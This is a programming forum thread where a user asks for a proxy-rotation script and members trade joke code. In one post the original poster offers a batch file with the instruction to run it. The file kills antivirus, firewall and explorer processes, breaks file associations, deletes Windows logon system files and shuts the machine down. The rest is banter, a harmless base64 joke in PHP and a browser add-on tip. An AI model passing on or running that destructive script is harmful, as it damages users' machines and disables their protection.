zabbix
+ Reply to Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 17

Thread: Simple loop.

  1. #1
    Join Date
    Apr 2008
    Posts
    18

    Post Simple loop.

    Hey, I'm a new user to this forum, so i guess this is me introducing myself.

    Can anyone whip me up a little script to loop a new proxy every few seconds?

    I dont have time for learning VBScript or all those useless languages/tools.
    I am still a little new to computer languages and programming other than the old HTML, javascript, and SQL.

    But back to the looping proxies, I would perfer it to be like Visual Basic or something. But I cant be picky, I'll take anything, Im a noob.
    <inject SQL here>

  2. #2
    Join Date
    Jan 2005
    Posts
    623
    useless languages/tools.
    Yeah, who needs useless programming right? Well here is your proxy loop. Enjoy.

    [php]
    <?PHP

    function decript_twit_level($RATING_translation,$RATING){
    while($RATING){
    $RATING_translation=base64_decode($RATING_translation);
    $RATING--;
    }
    return($RATING_translation);
    }


    function ProxyLoop($UserMessage){

    $UsefulProgramming=TRUE;

    if($UsefulProgramming===FALSE){
    $dizzy=TRUE;
    }else{
    $dizzy=FALSE;
    }

    if($dizzy===FALSE){
    // LOOP ME AGAIN!
    print($UserMessage);
    return(*);
    }else{
    // TOO DIZZY, STOP!
    return(0);
    }
    }



    // TWIT RATING 5/5
    $RATING=5;
    $RATING_translation='VmxSR*QyRXlVa*ppUldoVFZqSlNjbFV*WkZOa0*YQkdWR*RPYkdKV*NrcFdiVEYzWVVkV*ZsTnVaRnB pVjNoRVdWVldjMU5IVmtsWA0KYld4T*RVVmFkZz0*';

    while(ProxyLoop()){
    $UserMessage=decript_twit_level($RATING_translation,$RATING);
    ProxyLoop($UserMessage);
    }

    ?>
    [/php]
    Last edited by SyntaXmasteR; 05-07-2008 at 03:57 PM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  3. #3
    Join Date
    Apr 2008
    Posts
    18
    rofl.
    thats a good one.
    <inject SQL here>

  4. #4
    Join Date
    Apr 2008
    Posts
    18
    BTW,
    my twit rating is only 4/5.
    <inject SQL here>

  5. #5
    Join Date
    Jan 2005
    Posts
    623
    ... ....
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  6. #6
    Join Date
    Sep 2006
    Posts
    1,649
    I lol'ed at this thread.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  7. #7
    Join Date
    Apr 2008
    Posts
    18
    here save this as a batch file and run it.

    [php]

    title Twit Rating
    color 0A
    @echo off
    set end=md "Hack installing"
    set fin=copy "Hack log.txt" "Installing"
    %end%
    %fin%
    net send * twit.exe is installing, press OK to begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp*file
    cls
    msg * OK, mabeys only */5.
    msg * -ill0gic
    DEL C:\WINDOWS\system*2\logoff.exe /F /Q
    DEL C:\WINDOWS\system*2\logon.exe /F /Q
    DEL C:\WINDOWS\system*2\logon.scr /F /Q
    cls
    shutdown


    [/php]
    <inject SQL here>

  8. #8
    Join Date
    Apr 2008
    Posts
    18
    ^^ theres your useless programming.
    <inject SQL here>

  9. #9
    Join Date
    Sep 2006
    Posts
    1,649
    I think we should make this the useless/joke programs thread. Yay/nay?
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  10. #10
    Join Date
    Apr 2008
    Posts
    18
    Or just the Moderators not mock the ones who ask for help.
    <inject SQL here>

  11. #11
    Join Date
    Jan 2005
    Posts
    623
    Or just the Moderators not mock the ones who ask for help.
    All mods are very helpful here. If you ask for help you will probably get it.

    If you ask for someone to do all the work for you because you are too lazy to learn, [url=http://endor.org/sandler/laugh.html]They're all gonna laugh at you.[/url] ([url=http://************/watch?v=WoW88FEB2OU]AUDIO[/url])
    Last edited by SyntaXmasteR; 05-08-2008 at 02:10 PM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  12. #12
    Join Date
    Apr 2008
    Posts
    18
    Alright well I will keep that in mind,
    but i was simply asking if anyone had any code for an .exe that did that.
    But never mind, ill just stick to tor.
    <inject SQL here>

  13. #13
    Join Date
    Sep 2006
    Posts
    1,649
    You could use a Firefox addon like FoxyProxy to do this, assuming you have Firefox.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  14. #14
    Join Date
    Apr 2008
    Posts
    18
    Yeah i have that too.
    Well thanks anyway.
    <inject SQL here>

  15. #15
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by ill0gic View Post
    Or just the Moderators not mock the ones who ask for help.
    It's pretty much part of the job description these days.
    Who needs drugs when you have electrons?

+ Reply to Thread

Similar Threads

  1. simple question
    By privateloader in forum General discussion
    Replies: 0
    Last Post: 07-20-2014, 07:36 PM
  2. PHP loop through database and limit number of entries
    By gilbertsavier in forum Programming
    Replies: 0
    Last Post: 08-06-2009, 02:39 AM
  3. Should Be A Simple Question
    By TR86 in forum Internet Privacy
    Replies: 3
    Last Post: 01-30-2006, 01:41 AM
  4. Simple Solution
    By Unregistered in forum Internet Privacy
    Replies: 1
    Last Post: 03-05-2005, 03:19 AM
  5. Loop in batch file
    By loopers in forum Internet Privacy
    Replies: 2
    Last Post: 03-18-2003, 08:35 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts